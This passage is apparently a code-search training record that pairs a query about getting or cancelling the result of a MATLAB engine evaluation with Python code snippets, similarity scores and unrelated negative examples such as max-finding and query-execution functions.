1\n print(result)", "def largestV(a, b, x):\n v = a - 1\n while (binom(v, b) > x):\n v -= 1\n return v", "def largest_odd_times(L):\n \n l = []\n for i in set(L):\n if L.count(i) % 2 > 0:\n l.append(i)\n \n if l:\n return max(l)", "def max_list_iter(int_list): # must use iteration not recursion\n if int_list == []:\n return None\n elif int_list == None:\n raise ValueError\n max_int = int_list[0]\n \n for i in int_list:\n if i > max_int:\n max_int = i\n return max_int", "def find_best(counters):\n # result_list = []\n max_val = 0\n for counter in counters:\n if counter[3] >= max_val:\n max_val = counter[3]\n result_list = [counter for counter in counters if counter[3] == max_val]\n\n result_list = sorted(result_list, key=lambda x: (x[0], x[1]))\n\n return f'Best performance by: {result_list[0][2]}'", "def main():\n greatest = 0\n for i in range(1000, 100, -1):\n for j in range(i, 100, -1):\n palindrome = str(j*i)\n if ((palindrome == palindrome[::-1]) and (j*i) > greatest):\n greatest = j*i\n\t\t\t\n return greatest", "def max_profit(prices: List[int]) -> int:", "def recurrent_max_value_in_list(lst, max_value):\n if len(lst) == 0:\n return max_value\n elif lst[0] > max_value:\n max_value = lst[0]\n return 
recurrent_max_value_in_list(lst[1:], max_value)", "def maximumToys(moneyAvailable, priceList):\n priceList.sort()\n count = 0\n for toyPrice in priceList:\n if toyPrice <= moneyAvailable:\n count += 1\n moneyAvailable -= toyPrice\n else:\n return count", "def GetMax(val, maximum):\n\tval = float(val)\n\tmaximum = float(maximum)\n\treturn max([val, maximum])", "def personal_best(scores):\n# return sorted(scores, reverse=True)[0]\n return max(scores)", "def argmax(x):\n def op(a, b):\n comp = (a[1] > b[1])\n return comp.if_else(a[0], b[0]), comp.if_else(a[1], b[1])\n return tree_reduce(op, enumerate(x))[0]", "def argmax(x):\n def op(a, b):\n comp = (a[1] > b[1])\n return comp.if_else(a[0], b[0]), comp.if_else(a[1], b[1])\n return tree_reduce(op, enumerate(x))[0]", "def findPeakElement2(self, nums: List[int]) -> int:\n nums.insert(0, -float('inf'))\n nums.append(-float('inf'))\n l, r = 0, len(nums)\n\n while l < r:\n mid = l + (r - l) // 2\n if nums[mid] > nums[mid-1] and nums[mid] > nums[mid+1]:\n return mid - 1\n \n elif nums[mid] <= nums[mid-1] and nums[mid] <= nums[mid+1]:\n r = mid \n elif nums[mid-1] <= nums[mid] <= nums[mid+1]:\n l = mid\n elif nums[mid-1] >= nums[mid] >= nums[mid+1]:\n r = mid\n return l", "def calculate_greatest(self):\n greatest = 0\n for resourceList in self.loading.values():\n for time, use in resourceList:\n if use > greatest:\n greatest = use\n self.emit(\"greatest_calculated\",greatest)\n return greatest", "def maxi(a, b):\n return max(a, b)", "def r_max(nxs):\n largest = None\n for i,e in enumerate(nxs):\n if type(e) == type([]):\n val = r_max(e)\n else:\n val = e\n\n if i == 0 or val > largest:\n largest = val\n\n return largest", "def largest(array, n):\n\n #set max as first array element\n max = array[0]\n\n #compare current max with next array element, replace max if next element is larger\n\n for i in range(1, n):\n if array[i] > max:\n max = array[i]\n return max", "def fuction_call(chest):\n\n for i in chest:\n max_i = maximum(chest,i)\n if max_i >= 2:\n print(\"The maximum size of a set Matyoshka Dolls with outermost doll\",i,\"is\",max_i)", "def four():\r\n \r\n i = 999\r\n j = i\r\n largest = 0\r\n \r\n while i > 0:\r\n while j > 0:\r\n number = str(i * j)\r\n forward = str(number)\r\n reverse = \"\"\r\n for char in number:\r\n reverse = char + reverse\r\n if forward == reverse:\r\n if largest < i * j:\r\n largest = i * j\r\n break\r\n else:\r\n j = j - 1\r\n i = i - 1\r\n j = i\r\n return largest", "def largestPrimeFactor(number):\n factorlist = primeFactors(number)\n maximumfactor = max(factorlist)\n return maximumfactor", "def max_list_iter(int_list): # must use iteration not recursion\n max = \"blank\"\n if int_list is None:\n raise ValueError\n elif len(int_list) == 0:\n return None\n for i in int_list:\n if max == \"blank\":\n max = i\n elif i > max:\n max = i\n return max" ]
[ "0.7865657", "0.77563345", "0.7723488", "0.77118576", "0.7655584", "0.76221126", "0.7604391", "0.7559842", "0.7552165", "0.7419501", "0.7415454", "0.73194754", "0.72359556", "0.7183456", "0.7156729", "0.71380377", "0.7110791", "0.7098136", "0.7089967", "0.7050428", "0.70111907", "0.6968773", "0.6964207", "0.6955929", "0.69195765", "0.689578", "0.689235", "0.68536335", "0.68131983", "0.68097013", "0.6783531", "0.6783054", "0.6770581", "0.6721354", "0.67176485", "0.6657203", "0.66519094", "0.6643741", "0.66340435", "0.6629829", "0.6618661", "0.66153306", "0.6590982", "0.6574309", "0.6536879", "0.65343255", "0.65082854", "0.6501311", "0.6490182", "0.64722025", "0.6461375", "0.6455873", "0.64276063", "0.64150435", "0.6395264", "0.6392255", "0.63860565", "0.63700277", "0.6356902", "0.633506", "0.63311344", "0.6327141", "0.6312418", "0.6306703", "0.63005763", "0.62773526", "0.627653", "0.6275072", "0.62672955", "0.6265655", "0.6262679", "0.62509906", "0.6225705", "0.62125343", "0.62057006", "0.6194008", "0.6164187", "0.614969", "0.6138921", "0.6133452", "0.61320764", "0.6122995", "0.61185443", "0.61015314", "0.6089461", "0.6073423", "0.60703343", "0.606504", "0.6064653", "0.60616773", "0.603468", "0.603468", "0.6024994", "0.6024452", "0.6014998", "0.6014757", "0.6010166", "0.60076106", "0.60012734", "0.60007817", "0.59977454" ]
0.0
-1
Get the result of a MATLAB statement. Parameter
def result(self, timeout=None):
    self.__validate_engine()

    if self._retrieved:
        return self._result

    """
    Following code is used to poll the Ctrl+C every second from keyboard in
    order to cancel a MATLAB function.
    """

    try:
        result_ready = self.wait(timeout, pythonengine.waitForFEval)

        if not result_ready:
            raise TimeoutError(pythonengine.getMessage('MatlabFunctionTimeout'))

        self._result = pythonengine.getFEvalResult(self._future, self._nargout, None, out=self._out, err=self._err)
        self._retrieved = True
        return self._result

    except KeyboardInterrupt:
        self.cancel()
        if self.cancelled():
            print(pythonengine.getMessage('MatlabFunctionCancelled'))
    except:
        raise
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def execute_sql_scalar(self, sql):\n msg_type, msg = self.protocol.build_execute_statement(\"sql\", sql)\n self.protocol.send_msg(msg_type, msg)\n result = RowResult(self)\n result.fetch_all()\n if result.count == 0:\n raise InterfaceError(\"No data found\")\n return result[0][0]", "def result(self) -> global___Expression:", "def get_result(self, x):\n return self.i*x", "def get_variable(self, name):\n if self._scalamagic:\n intp = self.scala_interpreter\n intp.interpret(name)\n return intp.last_result()", "def result(self):\r\n # Module(body=[Expr(value=...)])\r\n return self.eval_(ast.parse(self.expr).body[0].value)", "def execute_command_with_return_value(stmt: str) -> dict:\n query_result = __conn__.execute(stmt)\n return query_result.fetchall()", "def getResult(self, param='Flux', src='TARGET'):\n lines = open(self.outgtlike, 'r').readlines()\n\n if param == 'upplim':\n value = -1\n error = 0 # default value\n for line in lines:\n if 'Upper limit' in line: \n value = line.split()[-2]\n else:\n CodeString = ''\n for line in lines:\n if not 'Upper limit' in line:\n CodeString += line[:-1]\n\n MyData = eval(CodeString)\n Values = MyData[src][param].split()\n value = float(Values[0])\n try: \n error = float(Values[2])\n except:\n error = 0\n \n return value, error", "def query(mdx_stmt):", "def select_scalar(self, *args, **kwargs):\n row = self.db_connection.execute(*args, **kwargs).fetchone()\n return None if row is None else row[0]", "def runQuery(tx, query, isReturn=False):\n result = tx.run(query)\n\n if isReturn:\n return result.data()", "def scalar(\n self,\n statement: Executable,\n params: Optional[_CoreSingleExecuteParams] = None,\n *,\n execution_options: OrmExecuteOptionsParameter = util.EMPTY_DICT,\n bind_arguments: Optional[_BindArguments] = None,\n **kw: Any,\n ) -> Any:\n\n return self._execute_internal(\n statement,\n params,\n execution_options=execution_options,\n bind_arguments=bind_arguments,\n _scalar_result=True,\n **kw,\n )", "def evaluate(self) -> int:", "def julia(self, line, cell=None):\n src = unicode(line if cell is None else cell)\n\n caller_frame = inspect.currentframe()\n if caller_frame is None:\n caller_frame = sys._getframe(3) # May not work.\n\n # We assume the caller's frame is the first parent frame not in the\n # IPython module. 
This seems to work with IPython back to ~v5, and\n # is at least somewhat immune to future IPython internals changes,\n # although by no means guaranteed to be perfect.\n while any(\n (\n caller_frame.f_globals.get(\"__name__\").startswith(\"IPython\"),\n caller_frame.f_globals.get(\"__name__\").startswith(\"julia\"),\n )\n ):\n caller_frame = caller_frame.f_back\n\n return_value = \"nothing\" if src.strip().endswith(\";\") else \"\"\n\n return self._julia.eval(\n \"\"\"\n _PyJuliaHelper.@prepare_for_pyjulia_call begin\n begin %s end\n %s\n end\n \"\"\"\n % (src, return_value)\n )(self.shell.user_ns, caller_frame.f_locals)", "def execute(self, query):\n # Create default return values.\n success = 'ERROR'\n result = None\n # Trim and split query.\n params = query.strip().split()\n if params:\n # Get query method in uppercase.\n method = params[0].upper()\n # Get method definition.\n if method in Matrix.METHODS:\n method_def = Matrix.METHODS[method]\n func = getattr(self, method_def['callable'])\n # Catch known exceptions.\n try:\n # Execute the function with validated parameters.\n validated_params = map(\n self._validate_param,\n method_def['params'],\n params[1:]\n )\n result = func(*validated_params)\n # We can assume that the method was executed succesfully.\n success = 'SUCCESS'\n except (TypeError, ValueError):\n # Do nothing. Default return values handle this case ;).\n pass\n return (success, result)", "async def queryone(self, stmt, *args):\n results = await self.query(stmt, *args)\n if len(results) == 0:\n raise NoResultError()\n elif len(results) > 1:\n raise ValueError(\"Expected 1 result, got %d\" % len(results))\n return results[0]", "def _get_result(self):\r\n \r\n return self._result", "def evaluateValue(compiled_expression):", "def scalars(\n self,\n statement: Executable,\n params: Optional[_CoreAnyExecuteParams] = None,\n *,\n execution_options: OrmExecuteOptionsParameter = util.EMPTY_DICT,\n bind_arguments: Optional[_BindArguments] = None,\n **kw: Any,\n ) -> ScalarResult[Any]:\n\n return self._execute_internal(\n statement,\n params=params,\n execution_options=execution_options,\n bind_arguments=bind_arguments,\n _scalar_result=False, # mypy appreciates this\n **kw,\n ).scalars()", "def result(value):\n return None, value, None", "def a_function_of_mine():\n return 'result'", "def getResult(self, *args, **kwargs):\r\n return None", "def get(self, sql, *args):\n try:\n return next(self.run(sql, *args))\n\n except StopIteration:\n raise utils.NoResult()", "def get_result(self) -> Any:\n ...", "def get_parameter(cur, par):\n cur.execute(\"SELECT value FROM parameters WHERE par='%s';\" % par)\n return cur.fetchone()[0]", "def Execute(self):\n return _gmat_py.GmatCommand_Execute(self)", "def get_result(self):\n if len(self.result_transcripts) > 0:\n return self.result_transcripts[0]\n else:\n return ''", "def execselect(self, sql, vals=()):\n self.conn.ping()\n c = self.conn.cursor()\n c.execute(sql, vals)\n return c.fetchone()", "def SetResultValue(self, *args):\n return _gmat_py.Solver_SetResultValue(self, *args)", "def evaluate(self, script, ret_type, params=[]):\n # Evaluate script\n result = eval(script, {'args': params, 'numpy': numpy})\n logging.debug('Result: {}'.format(result))\n\n bundledRows = SSE.BundledRows()\n if isinstance(result, str) or not hasattr(result, '__iter__'):\n # A single value is returned\n bundledRows.rows.add(duals=self.get_duals(result, ret_type))\n else:\n for row in result:\n # note that each element of the result should represent a row\n 
bundledRows.rows.add(duals=self.get_duals(row, ret_type))\n\n return bundledRows", "def __call__(self,thing):\n return self.compiled(thing)", "def ASQL(*rest):\n if str(acm.Class()) == \"FTmServer\":\n acm.RunModuleWithParameters(__name__, acm.GetDefaultContext().Name())\n return 'SUCCESS'\n else:\n return 'FAILED'", "def run(self):\n return self.opt().eval()", "def query(self, query):\n cursor = self.database.cursor()\n cursor.execute(query)\n # If it's a query that's expected to return a value (EG: SELECT)\n if query.strip().lower().startswith('select'): return cursor.fetchall()", "def result_stdout(result):\n return result[1][0]", "def evaluate(compiled_expression):", "def get_output(self):\r\n _debug('simq03b_api.get_output')\r\n \r\n x = self.query('OUTP:STAT?')\r\n if x == None: return None\r\n print('Result is ', x) # For knowing the bug that we something have\r\n return int(x)", "def execute(self, statement):\n return self._engine.connect().execute(statement)", "def result(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"result\")", "def result(self):\n return self['result']", "def retrieve_result(self, x, y):\n pass", "def last_result(self):\n # TODO : when evaluating multiline expressions this returns the first result\n lr = self.jiloop.lastRequest()\n res = lr.lineRep().call(\"$result\", spark_jvm_helpers.to_scala_list([]))\n return res", "def execute(self) -> Any:\n return self.function(**self.kwargs)", "def get_result(self):\r\n return conf.lib.clang_getResultType(self)", "def getResult(self):\n return self.ok", "def fetchone(self, sql, val=()):\n cursor = self.__db.cursor()\n cursor.execute(sql, val)\n return cursor.fetchone()", "def value(self) -> global___Expression:", "def value(self) -> global___Expression:", "def get_result(self):\r\n return (self.x, self.lambd)", "def result(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"result\")", "def sql_execute(sql,value):\n cur = c.cursor()\n cur.execute(sql,value)\n results = cur.fetchall()\n return results", "def execute_function(self, function_name_params, function_args=None):\r\n data = self.db.execute(\"select \" + function_name_params, function_args)\r\n return data", "def __matmul__(self, qubit):\n if isinstance(qubit, str):\n qubit = self.get_index(qubit)\n return self.compiled[qubit].y", "def _query_one(self, sql, data=None):\n\n conn = psycopg2.connect(self.connect_args)\n cur = conn.cursor()\n cur.execute(sql, data)\n result = cur.fetchone()\n cur.close()\n conn.close()\n return result", "def get_one(self, sql_command, cmd_param=None):\n if cmd_param:\n count = self._mysql_cursor.execute(sql_command, cmd_param)\n else:\n count = self._mysql_cursor.execute(sql_command)\n\n if count:\n sql_result = self._mysql_cursor.fetchoneDict()\n else:\n sql_result = None\n\n return sql_result", "def eval(self) -> typing.Any:\n return self.expr()", "def test_expr(self):\n x = t.Action(\"returnStuff()\")\n self.assertEqual(writePython(x),\n dd(\"\"\"\n _G_python_1, lastError = eval('returnStuff()', self.globals, _locals), None\n self.considerError(lastError, None)\n _G_python_1\n \"\"\"))", "def _execute(self, stmt) -> sa.engine.ResultProxy:\n return self._engine.execute(stmt)", "async def scalar(self, query, connection=None):\n async with self.connection(connection) as conn:\n r = await conn.execute(query)\n return await r.scalar()", "def value(self):\n if len(self.description) != 1:\n msg = \"Results set with %d cols cannot be treated as value\"\n raise TypeError(msg % len(self.description))\n num_rows = 
len(self._rows)\n if num_rows == 0:\n raise NoResults()\n elif num_rows > 1:\n raise MultipleResults(num_rows)\n return self._rows[0][0]", "def let_statement(u):\n if u.__class__ is node.let:\n if (u.ret.__class__ is node.ident and\n u.args.__class__ is node.matrix):\n u.args = node.funcall(func_expr=node.ident(\"matlabarray\"),\n args=node.expr_list([u.args]))", "def output(self):\n return self.expr.lhs", "def script_execution_get() -> str | None:\n if (data := script_execution_cv.get()) is None:\n return None\n return data.script_execution", "def test_result(self, expected_matrix):\n return \"Result is correct\" if self.matrix == expected_matrix else \"Result is not correct\"", "def query(self, x):\n # print(f\"Calling oracle with x: {x}, args={self.oracle_args}, kwargs={self.oracle_kwargs}\")\n return self.oracle(x, *self.oracle_args, **self.oracle_kwargs)", "def execute_statement_on_n1ql(self, client, statement, client_context_id=None):\n try:\n response = self.execute_via_sdk(client, statement, False, client_context_id)\n if type(response) == str:\n response = json.loads(response)\n if \"errors\" in response:\n errors = response[\"errors\"]\n else:\n errors = None\n\n if \"results\" in response:\n results = response[\"results\"]\n else:\n results = None\n\n if \"handle\" in response:\n handle = response[\"handle\"]\n else:\n handle = None\n\n if \"metrics\" in response:\n metrics = response[\"metrics\"]\n else:\n metrics = None\n if \"status\" in response:\n status = response[\"status\"]\n else:\n status = None\n return status, metrics, errors, results, handle\n\n except Exception as e:\n raise Exception(str(e))", "def returnOne(self):\n try:\n # self.checkValName()\n self.cursor.execute(self.query % self.val)\n self.results = self.conn.fetchone()\n except Exception as e:\n print \"Query failed: %s \" % e", "def GetResult(self, playerjm):\n return self.score / len(self.scores)", "def test_function(var):\n return var * 2", "def generate_emulate(self, result_ternary, result, mpfr_x, mpfr_rnd):\n emulate_func_name = \"mpfr_log\"\n emulate_func_op = FunctionOperator(emulate_func_name, arg_map = {0: FO_Arg(0), 1: FO_Arg(1), 2: FO_Arg(2)}, require_header = [\"mpfr.h\"]) \n emulate_func = FunctionObject(emulate_func_name, [ML_Mpfr_t, ML_Mpfr_t, ML_Int32], ML_Int32, emulate_func_op)\n mpfr_call = Statement(ReferenceAssign(result_ternary, emulate_func(result, mpfr_x, mpfr_rnd)))\n\n return mpfr_call", "def get_output(self):\r\n x = self.query('OUTP?')\r\n if x == None: return None\r\n return int(x)", "def goto(cls, quad):\n\t\treturn quad.result", "def get_return_value(self):\n return None #Default value to indicate that no meaningful result was returned", "async def one(\n self,\n statement: Executable,\n params: t.Optional[\n t.Union[t.Mapping[str, t.Any], t.Sequence[t.Mapping[str, t.Any]]]\n ] = None,\n execution_options: t.Optional[t.Mapping[str, t.Any]] = None,\n bind_arguments: t.Optional[t.Mapping[str, t.Any]] = None,\n ) -> t.Any:\n result = await self.execute(\n statement, params, execution_options=execution_options, bind_arguments=bind_arguments\n )\n if isinstance(result, sa.engine.CursorResult):\n item = result.one()\n else:\n item = result.scalar_one()\n return item", "def run(self, statement, parameters=None):\n assert not self.closed\n return run(self.connection, statement, parameters)", "def get_value(self, block):\n value = getattr(block, self.parameter_name)\n if self.formula is not None:\n value = self.formula(value)\n\n return value", "def result(self) -> Any:\n if 
self._result is self._no_result:\n raise UnevaluatedQuandary(\"You haven't left the with block, so the quandary hasn't been evaluated yet\")\n\n return self._result", "def evaluate(self, out, scope):\n value = self.execute(out, scope)\n if value is not None: # Note the distinction here -- 0 is false but we want to print it!\n out.write(self.stringify(value))", "def get_sparql_value(sresult, variable_id):\n val = ''\n if variable_id in sresult:\n val = sresult[variable_id]['value']\n return val", "def test(a):\r\n return (a**2)", "def evaluateMacro(compiled_expression):", "def execute(self, sql):\n with self.connection.cursor() as dbc:\n if sql[-1] != ';':\n sql += ';'\n dbc.execute(sql)\n self.last_row = dbc.lastrowid\n try:\n return dbc.fetchall()\n except:\n return", "def query(query, args=(), one=False):\n cur = get_db().execute(query, args)\n result = cur.fetchall() # result is the answer to the query\n cur.close()\n return (result[0] if result else None) if one else result", "def get(self):\n\n # -------------------------------------------\n # Build command string\n\n cmd = dict()\n\n cmd[\"name_\"] = self.thisptr[\"df_name_\"]\n cmd[\"type_\"] = \"BooleanColumn.get\"\n\n cmd[\"col_\"] = self.thisptr\n\n # -------------------------------------------\n # Send command to engine\n\n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n # -------------------------------------------\n # Make sure everything went well, receive data\n # and close connection\n\n if msg != \"Found!\":\n s.close()\n raise Exception(msg)\n\n mat = comm.recv_boolean_matrix(s)\n\n # -------------------------------------------\n # Close connection, if necessary.\n\n s.close()\n\n # -------------------------------------------\n\n return mat.ravel()", "def test_fun_result(self):\n x = CArray([3, 5])\n correct_result = x[0] ** 2 + x[1] ** 2\n self._test_fun_result(self.fun, x, correct_result.item())", "def load(self, input_parameter: str) -> FormulaResultType:\n raise NotImplementedError()", "def getValue(self):\n # compute the values of my operands\n values = (op.getValue() for op in self.operands)\n # apply my operator\n return self.evaluator(*values)", "def execute(self,sql):\n # self.results = self.execute_silent(sql)\n # return self.results\n # sql = self.format_sql(sql, **kwargs)\n sql_list = sql.split(';')\n for stmt in sql_list:\n if stmt:\n stmt = stmt.strip()\n if len(stmt) < 10:\n break\n result = self.execute_silent(stmt)\n #if result is not None,It's select stmt.\n if result:\n return result", "def getValue(self):\n return _libsbml.Parameter_getValue(self)", "def _call(self, x):\n return self.constant", "def returnOne(self):\n try:\n # self.checkValName()\n self.dbc.execute(self.query, self.val)\n self.results = self.dbc.fetchone()\n except MySQLdb.Error, e:\n print \"Query failed: %s \" % e", "def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out", "def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out", "def task_calc():\n return 'What is the result of the expression?'", "def evaluator_side_effect(_, __, math_string):\r\n return mapping[math_string]", "def get_result(self, state):\n pass", "def _call_op_sugar(self, op_idx, *args):\n if not all(isinstance(a, six.integer_types) for a in args):\n raise TypeError('All args passed to call_op must be integers '\n '(LoomResult ids.) 
Did you forget to call constant?')\n result = self._weaver.CallOp(op_idx, args)\n if not result:\n raise AssertionError('Weaver op call failed: %s' %\n self._weaver.error_string())\n if len(result) == 1:\n return result[0]\n return result", "def evaluate(self):\n pass", "def evaluate(self):\n pass", "def onStatement(self, match):\n\t\treturn self.process(match[0])", "def result(self):\n return self.a" ]
[ "0.5909357", "0.5690119", "0.5548101", "0.5496141", "0.54489595", "0.54063964", "0.5397221", "0.5366224", "0.5346653", "0.52857095", "0.5272317", "0.52682745", "0.5259357", "0.52247185", "0.52104545", "0.51776475", "0.5130771", "0.51298857", "0.51254255", "0.51205885", "0.5114767", "0.5104054", "0.50701547", "0.50664186", "0.5054471", "0.50491834", "0.5039676", "0.50339466", "0.5028968", "0.5023355", "0.5016088", "0.49933735", "0.49875823", "0.496096", "0.49518067", "0.4950829", "0.49430504", "0.4940182", "0.4940075", "0.49381474", "0.4931755", "0.4923867", "0.4915737", "0.49077028", "0.4875746", "0.48754197", "0.48754197", "0.4873794", "0.48606938", "0.48604268", "0.4859955", "0.485938", "0.48587757", "0.48579106", "0.48546013", "0.48502794", "0.484282", "0.48370844", "0.48369464", "0.48258638", "0.48251712", "0.48147956", "0.48086992", "0.4805381", "0.47968122", "0.47949126", "0.47947735", "0.47943965", "0.47904345", "0.47868657", "0.4778198", "0.47757646", "0.4769272", "0.47684452", "0.47610968", "0.47491586", "0.47460005", "0.47440287", "0.4737926", "0.47321898", "0.4728212", "0.4725618", "0.47255763", "0.47236213", "0.47197127", "0.47193384", "0.4719238", "0.47161365", "0.47139853", "0.47071564", "0.4702793", "0.4702793", "0.47026077", "0.46957916", "0.46937487", "0.46901768", "0.4688759", "0.4688759", "0.4687068", "0.46831784" ]
0.4819287
61
Cancel the execution of an evaluation of a MATLAB statement. Returns bool: True if the corresponding MATLAB statement can be cancelled; False otherwise. Raises RejectedExecutionError: an error occurs if the engine is terminated.
def cancel(self):
    self.__validate_engine()
    return pythonengine.cancelFEval(self._future)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cancelled(self):\n self.__validate_engine()\n return pythonengine.isCancelledFEval(self._future)", "def cancel(self):\n if not self.is_cancelled:\n self.will_change_value_for('is_cancelled')\n self.cancelled = True\n # remove our dependencies so that we're ready, properly behaved operations\n # will honor the cancel flag\n self.dependencies.clear()\n self.did_change_value_for('is_cancelled')\n \n if not self.is_executing and not self.is_finished:\n with self.changing('is_finished'):\n self.finished = True", "def cancel(self):\n with self._done_condition:\n if self._state in [RUNNING, FINISHED]:\n return False\n if self._state == CANCELLED:\n return True\n self._state = CANCELLED\n self._done_condition.notify_all()\n self.__invoke_callbacks()\n return True", "def cancel(self):\n self._logger.warning(\"Comparison run being cancelled.\")\n self._msg_logger.warning(run_analysis_view._text[\"log10\"])\n if hasattr(self, \"_off_thread\"):\n self._off_thread.cancel()", "def cancel(self):\n self._log.debug(\"About to cancel job {0}\".format(self.id))\n resp = self._api.cancel(self.id)\n\n if resp.success:\n self.update()\n return True\n\n if resp.result.type is None:\n # Call was successful but job was unable to be cancelled.\n return False\n\n else:\n raise resp.result", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def stop_execution(self):\n self.send_message(\"control.stop\",None)", "def cancel(self):\n resp = self._api.cancel_task(self._job, self.id)\n\n if resp.success:\n return True\n\n if resp.result.type is None:\n # Call was successful but task was unable to be cancelled.\n return False\n\n else:\n raise resp.result", "def stop_evaluator(self):\n\n if self.evaluator_proc is None:\n raise RuntimeError(\"Evaluator not running this process.\")\n\n if isinstance(self.evaluator_proc, Process):\n self.evaluator_proc.terminate()\n\n elif isinstance(self.evaluator_proc, Thread):\n self.evaluator_stop.set()\n self.evaluator_proc.join()\n self.evaluator_stop = None\n\n self.evaluator_proc = None", "def cancel(self) -> bool:\n # Cancel analysis first since it is queued on jobs, then cancel jobs\n # otherwise there can be a race issue when analysis starts running\n # as soon as jobs are cancelled\n analysis_cancelled = self.cancel_analysis()\n jobs_cancelled = self.cancel_jobs()\n return analysis_cancelled and jobs_cancelled", "def stop_query_execution(QueryExecutionId=None):\n pass", "async def cancel(self):\n result = await self.done()\n if result:\n return False\n else:\n await self._cancel()\n return True", "def cancel(self):\n if self.cancelled() or self.done():\n return False\n self._is_done = True\n self._is_cancelled = True\n return True", "def stopIf(self, expr, message):\r\n if expr: self.stop(message)", "def cancel(self):\n return self.RES_OK", "def runloop_cancel():\n raise RunloopCancel()", "def cancel(self):\n\n query = f\"scancel {self.jobid}\"\n if self.cluster:\n query = f\"scancel {self.jobid} --clusters={self.cluster}\"\n\n cmd = BuildTestCommand(query)\n cmd.execute()\n logger.debug(f\"Cancelling Job: {self.jobid} by running: {query}\")\n\n self.poll()\n self._state = \"CANCELLED\"", "def kill(self):\n return self._raw_execute(\"cancel\", {\"job_id\": self.job_id})", "def do_uncancel(self):\r\n self.write({'cancelled': False})", "def stopEvaluationMode(self):\n 
self.data_ref = self.saved_dat_ref", "def cancel(self) -> None:\n c = self.pgconn.get_cancel()\n c.cancel()", "def cancel(self):\n\t\treturn Job(SDK.PrlJob_Cancel(self.handle)[0])", "def cancel(self):\n GameLoop.getInstance()._cancelation_token = True", "def _abort_if_false(ctx, param, value):\n if not value:\n ctx.abort()", "def abort(self):\r\n LOG(\"Aborting execution\")\r\n self.controller.abort()", "def cancel(self, /, noerror=False):\n\t\tif not self in _running:\n\t\t\tif noerror: return\n\t\t\traise RuntimeError('Not running')\n\t\tfor anim in self.animations:\n\t\t\tanim.cancel(noerror=True)\n\t\t_running.remove(self)\n\t\t_anim_stopped(self)", "def cancel(self, /, noerror=False):\n\t\tif not self in _running:\n\t\t\tif noerror: return\n\t\t\traise RuntimeError('Not running')\n\t\tfor anim in self.animations:\n\t\t\tanim.cancel(noerror=True)\n\t\t_running.remove(self)\n\t\t_anim_stopped(self)", "def cancel():", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def cancel(self):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)", "def abort(self):\n\n if self.process:\n self.process.kill()\n return True\n else:\n return False", "def stop_workflow_execution(self, cntx, **kwargs):\n execution_id = kwargs.get('execution_id')\n\n return db_api.execution_update(execution_id,\n {\"state\": states.STOPPED})", "def stop(self):\n if self.isCompiled():\n glUseProgram(0)\n else:\n raise Exception(\"el programa no ha sido compilado aun\")", "def cancel(self):\n self.cancelled = True", "def cancel(self):\n self.cancelled = True", "def abort(self):\n if self.process:\n self.process.kill()\n return True\n else:\n return False", "def stop(self):\n command = input(\"Enter anything to finish (or 'exit' to cancel)>>>\")\n return command != 'exit'", "def stop(self):\n calcEngine = CalcEngine.factory(self.client_session)\n return calcEngine.stop()", "def cancel(self, connection):\n if hasattr(connection, \"cancel\"):\n connection.cancel()\n else:\n # A default cancel for databases for which no specific cancel is implemented\n # This will force an exit of the connection context manager\n raise QueryCancelled(\"Query was cancelled\")", "def cancel(self):\n self.waiter.set_result_if_pending(True)\n \n timer = self.timer\n if (timer is not None):\n self.timer = None\n timer.cancel()", "def cancel(self):\n self.__canceled = True", "def stopCond(self):\n\t\treturn False", "def canceled(self):\n with self._done_condition:\n return self._state == CANCELLED", "def cancel_operation(self):\n # <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>\n self.proceed = False\n self.entry_view.destroy()", "async def cancelled(self):\n await self._refresh_and_update()\n return (\n self._operation.HasField(\"error\")\n and self._operation.error.code == code_pb2.CANCELLED\n )", "def cancel(self):", "def cancel(self):", "def cancel(self):", "def _cancel(self, d):\n if self._finished:\n return\n try:\n raise CancelledError()\n except:\n self._caught_failure = failure.Failure()\n self._iterate()", "def cancel_run(self, run_id):\n raise NotImplementedError()", "def cancel(self): #$NON-NLS-1$\r", "def do_cancel(self):\r\n self.write({'cancelled': True})", "def query_abort(self) -> bool:\n return self._workers[threading.get_ident()].abort", "def cancel_work(self, message=\"This test was cancelled by lifeguard script because the test was interrupting progress (taking too long).\"):\n 
slick = SlickAsPy(self.environment.slickurl + \"/api\")\n status = slick.get_host_status(self.name)\n if status['currentWork'] is not None:\n slick.cancel_result(status['currentWork'], message)", "def cancel_stop(cls):\n cls._set_mode_running()", "def stopUnless(self, expr, message):\r\n if not expr: self.stop(message)", "def cancel(self):\n if self.is_market:\n log.info(\"bo#%s: can't cancel order (market)\" % self.ticket)\n return(False)\n else:\n log.info(\"bo#%s: cancel master order, limit and stop order\" % self.ticket)\n if self.is_cancellable:\n cancel_order(self.order_master)\n cancel_order(self.order_limit)\n cancel_order(self.order_stop)\n self.cancelled.emit(bo=self)\n self.bo_blotter._move_cancelled_order(self)\n return(True)\n else:\n log.info(\"bo#%s: can't cancel order (not cancellable)\" % self.ticket)\n return(False)", "def abort_if_false(ctx, param, value):\n if not value:\n ctx.abort()", "def stop(self):\n if self._current_request is not None:\n self._current_request.addErrback(lambda _: None)\n self._current_request.cancel()\n self._current_request = None\n\n agent_pool = getattr(self._agent, '_pool', None)\n if agent_pool:\n return agent_pool.closeCachedConnections()\n return succeed(None)", "def _cancelCommands(self, reason):\n while self._current:\n cmd = self._current.pop(0)\n cmd.fail(reason)", "def cancel(self):\n self.stop()\n self.make_callback('canceled')", "def cancel(self):\n pass", "def cancel(self):\n self.cancelled.set()", "def _cancel(self):\n self.waiter.set_result_if_pending(None)\n \n timer = self.timer\n if (timer is not None):\n self.timer = 